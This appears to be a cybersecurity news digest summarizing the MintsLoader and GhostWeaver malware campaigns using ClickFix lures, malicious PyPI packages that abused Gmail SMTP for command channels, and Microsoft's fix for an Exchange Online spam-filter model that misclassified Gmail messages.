Update: MintsLoader and GhostWeaver Malware Campaigns Now Utilizing ClickFix
Threat actors use a malware loader, MintsLoader, to deploy the remote access trojan GhostWeaver through increasingly sophisticated phishing and drive-by campaigns. Since early 2023, MintsLoader has used a multi-stage infection process involving obfuscated JavaScript and PowerShell scripts that evade detection by avoiding sandbox environments and virtual machines. Once executed, the loader uses a domain generation algorithm (DGA) to establish command-and-control communication and deliver follow-on payloads, including GhostWeaver, StealC and modified BOINC clients. Recent attacks have used ClickFix—a social engineering tactic that tricks users into executing code manually—disguised as prompts to fix system errors or complete security verifications. These fake update lures have been linked to broader e-crime ecosystems tied to groups like SocGholish and LandUpdate808, which have previously targeted legal, industrial, and energy sectors. GhostWeaver builds on the infection chain by maintaining persistent, encrypted communication with its command-and-control infrastructure using TLS and a hard-coded, obfuscated certificate. It downloads additional plugins to steal browser data, manipulate content, and maintain remote access over time. Researchers have also observed the malware using ClickFix and MSHTA-based techniques to deploy other info-stealers like Lumma, making these campaigns increasingly versatile and harder to track. The malware’s ability to redeploy MintsLoader for further infections reinforces its modular and persistent nature. These operations highlight a rising trend in threat actor sophistication, where seemingly simple loaders are central to long-term espionage and data theft efforts across multiple sectors.
Malicious Python Packages Abused Gmail SMTP to Create Covert Command Channels
A recently discovered supply chain attack targeting the Python open-source ecosystem has revealed the use of Gmail’s SMTP service to establish covert communication tunnels for remote command execution. Socket’s Threat Research Team uncovered seven interconnected malicious packages published on the Python Package Index (PyPI), all masquerading as developer tools under names like Coffin-Codes-Pro and Coffin2022. Once installed, these packages are connected to Gmail’s servers using hardcoded credentials and send encrypted beacons to attacker-controlled email accounts. Gmail’s trusted infrastructure allowed the malicious traffic to bypass most network security systems undetected, evading traditional perimeter defenses and blending into normal email flows. After the initial connection, the implants opened WebSocket tunnels to receive remote commands, enabling attackers to exfiltrate sensitive data, move laterally within networks, execute shell commands, and manipulate systems remotely. The campaign's persistence and evolution, dating back to 2021, show a methodical approach to compromising developer environments through trusted software channels. While the packages have been removed from PyPI, their long-standing presence highlights the difficulty securing open-source software ecosystems. The incident underscores a growing trend of stealthy, modular malware delivered through legitimate development tools, reinforcing the need for continuous code auditing and threat monitoring in the software supply chain.
Update: Microsoft Fixes Faulty Machine Learning Update That Misclassified Gmail Emails as Spam
Microsoft has resolved a machine learning error in Exchange Online that incorrectly flagged Gmail messages as malicious, sending legitimate emails to users’ junk folders. The issue logged as EX1064599 in the Microsoft 365 admin center, began on April 25, 2025, and was tied to a misconfigured machine-learning model designed to filter risky email content. According to Microsoft, the model mistakenly associated certain characteristics of legitimate Gmail traffic with known spam campaigns, leading to widespread false positives. While the company did not disclose the number of affected users or regions, the incident reached a severity level where administrators had to implement manual rules to prevent further email disruptions. By May 1, Microsoft confirmed it had fully reverted the flawed model to its prior version, effectively mitigating the issue and restoring normal service behavior. The company stated that telemetry data confirmed the resolution, but this is the latest in similar incidents involving Exchange Online’s spam filters. Over the past year, Microsoft has addressed multiple machine learning misclassifications, including one incorrectly quarantined Adobe email and another flagged email with malicious embedded images. These recurring events raise concerns about the reliability of automated spam detection, especially when machine learning models are updated without adequate testing. Microsoft has pledged to enhance the robustness of its email filtering system and explore improvements to reduce false positives in future updates.
